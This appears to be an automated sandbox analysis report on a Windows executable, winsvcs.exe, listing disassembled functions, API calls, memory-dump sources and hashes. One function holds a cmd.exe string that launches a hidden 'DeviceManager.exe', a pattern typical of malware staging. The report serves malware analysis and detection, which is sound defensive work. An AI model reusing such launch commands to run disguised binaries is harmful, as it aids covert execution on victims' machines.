Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 0040F7B1 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D

Function 004020F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00402100
CoCreateInstance.OLE32(004051CC,00000000,00000001,004051BC,?), ref: 0040212F

Strings

%windir%\system32\cmd.exe, xrefs: 00402142
/c start _ & _\DeviceManager.exe & exit, xrefs: 004021AA

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: CreateInitializeInstance
String ID: %windir%\system32\cmd.exe$/c start _ & _\DeviceManager.exe & exit
API String ID: 3519745914-2217386832
Opcode ID: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
Instruction ID: 57fe1dbd42bb2324eb575007eabe7048b87a754a97f5de83621bb56dba04deff
Opcode Fuzzy Hash: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
Instruction Fuzzy Hash: 1C414C74A00209EFDB01DF98D989E9DBBB1FF49305F1081A5F921AB2A1C775AA50EF44

Function 00411720 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$DeleteEnterExceptionLeaveRaise
String ID:
API String ID: 3416413283-0
Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59

Function 004335AA Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
__isleadbyte_l.LIBCMT ref: 00433612
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55

Function 00415099 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 004150E7
lstrlenW.KERNEL32(?), ref: 00415103
lstrlenW.KERNEL32(?), ref: 00415121
_memcpy_s.LIBCMT ref: 0041512F

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: lstrlen$String_memcpy_s
String ID:
API String ID: 1108949412-0
Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4

Function 00423E40 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8

Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
String ID:
API String ID: 2677508003-0
Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C

Function 0042E1D8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0042E1FE

Part of subcall function 0042E023: __fltout2.LIBCMT ref: 0042E04F

__cftog_l.LIBCMT ref: 0042E224
__cftoe_l.LIBCMT ref: 0042E256

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95

Function 0042C34A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042C356

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 0042C36D
__amsg_exit.LIBCMT ref: 0042C37B
__lock.LIBCMT ref: 0042C38B

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E

Function 0040FFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041004A
_memcpy_s.LIBCMT ref: 00410066

Strings

list<T> too long, xrefs: 0040FFD8, 0041005F, 004100AE

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: list<T> too long
API String ID: 4160651998-4027344264
Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B

Function 00410AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00410B63
_memcpy_s.LIBCMT ref: 00410B7F

Strings

deque<T> too long, xrefs: 00410AE3, 00410B78, 00410BC7

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s
String ID: deque<T> too long
API String ID: 4160651998-309773918
Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B

Function 004291EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004291FA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429208

Strings

csm, xrefs: 00429216

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

Analysis Process: winsvcs.exePID: 6200, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	9.9%
Signature Coverage:	0%
Total number of Nodes:	1086
Total number of Limit Nodes:	25

Executed Functions

Function 0040B517 Relevance: 884.2, APIs: 488, Strings: 15, Instructions: 3992windowtimethreadCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000007B), ref: 0040B567
GetClientRect.USER32(?,?), ref: 0040B578
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
GetDC.USER32(0044A660), ref: 0040B61C
CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
SelectObject.GDI32(0044A655,00000000), ref: 0040B648
SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
SetTextColor.GDI32(0044A655,?), ref: 0040B662
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
LineTo.GDI32(0044A654,?,?), ref: 0040B727
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
LoadIconA.USER32(00000000), ref: 0040B7F6
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
GetClientRect.USER32(00000000,?), ref: 0040B849
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
GetDC.USER32(0044A660), ref: 0040BA7C
CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
LoadIconA.USER32(00000000), ref: 0040BC9C
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
GetClientRect.USER32(00000000,?), ref: 0040BCEF
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
LoadBitmapA.USER32(00000000), ref: 0040BD75
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
LoadIconA.USER32(00000000), ref: 0040BE92
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
GetClientRect.USER32(00000000,?), ref: 0040BEE3
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
LoadBitmapA.USER32(00000000), ref: 0040BF69
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
GetDC.USER32(0044A660), ref: 0040C00C
CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
SetTextColor.GDI32(0044A655,?), ref: 0040C05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
GetClientRect.USER32(0044A660,?), ref: 0040C0C1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
LoadIconA.USER32(00000000,00007F02), ref: 0040C171
GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
LoadIconA.USER32(00000000), ref: 0040C19D
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
GetClientRect.USER32(00000000,?), ref: 0040C1F0
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
GetDC.USER32(0044A660), ref: 0040C33F
CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
SetTextColor.GDI32(0044A655,?), ref: 0040C385
GetDC.USER32(0044A660), ref: 0040C41F
CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
SetTextColor.GDI32(0044A655,?), ref: 0040C465
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
LineTo.GDI32(0044A654,?,?), ref: 0040C557
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
GetClientRect.USER32(0044A660,?), ref: 0040C5C8
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
LoadIconA.USER32(00000000,00007F02), ref: 0040C748
GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
LoadIconA.USER32(00000000), ref: 0040C774
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
GetClientRect.USER32(00000000,?), ref: 0040C7C7
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
LoadBitmapA.USER32(00000000), ref: 0040C84D
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
GetClientRect.USER32(0044A660,?), ref: 0040C8E1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
GetDC.USER32(0044A660), ref: 0040C985
CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
GetClientRect.USER32(0044A660,?), ref: 0040CA25
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
GetDC.USER32(0044A660), ref: 0040CAC9
CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
LoadIconA.USER32(00000000), ref: 0040CBA1
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
GetClientRect.USER32(00000000,?), ref: 0040CBF4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
LoadBitmapA.USER32(00000000), ref: 0040CC7A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
GetDC.USER32(0044A660), ref: 0040CD1D
CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
SetTextColor.GDI32(0044A655,?), ref: 0040CD63
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
GetClientRect.USER32(0044A660,?), ref: 0040CE92
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
